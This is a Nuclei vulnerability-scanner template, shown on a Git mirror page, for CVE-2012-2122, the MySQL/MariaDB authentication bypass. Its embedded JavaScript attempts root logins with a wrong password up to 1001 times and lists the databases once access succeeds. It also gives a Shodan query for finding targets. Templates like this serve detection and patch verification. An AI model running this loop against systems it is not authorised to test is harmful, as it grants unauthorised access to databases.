admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-04 01:33:21 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
a4e11c2f2fd7c9f4c357b525eeeb6ee00a8df3aa
nuclei-templates/javascript/cves/2012/CVE-2012-2122.yaml
ghost bac0dcc8cd chore: sign templates 🤖
2025-12-17 05:44:08 +00:00

70 lines
2.6 KiB
YAML
Raw Blame History

id: CVE-2012-2122
info:
name: MySQL - Authentication Bypass
author: pussycat0x
severity: medium
description: |
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
impact: |
Attackers can bypass authentication by repeatedly attempting to authenticate with incorrect passwords, eventually succeeding due to improper memcmp return value checking in certain environments.
remediation: |
Upgrade to MySQL 5.1.63, 5.5.24, 5.6.6 or later, or MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 or later that properly handles memcmp return values.
reference:
- https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
- http://kb.askmonty.org/en/mariadb-5162-release-notes/
- http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
- http://security.gentoo.org/glsa/glsa-201308-06.xml
- http://securitytracker.com/id?1027143
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
cvss-score: 5.1
cve-id: CVE-2012-2122
cwe-id: CWE-287
epss-score: 0.94058
epss-percentile: 0.99892
cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: oracle
product: mysql
shodan-query:
- "product:\"MySQL\""
- product:"mysql"
tags: cve,cve2012,js,enum,network,mysql,fuzz,oracle,vuln
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const mysql = require('nuclei/mysql');
const client = new mysql.MySQLClient;
for (let i = 1; i <= 1001; i++) {
try {
const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
Export(connected);
break;
} catch {
// error
}
}
args:
Host: "{{Host}}"
Port: 3306
User: "root"
Pass: "wrong"
Query: "show databases;"
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- .Rows[] | .Database
# digest: 4b0a0048304602210099162fbdf5e9dc7b8820145f130ee36e33d6c2a34b75c55ed8ad524d3d71c90f0221008367e279c091762a626b66fbadb81b9b0eb379f5b57efd165e282b996f8bf927:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink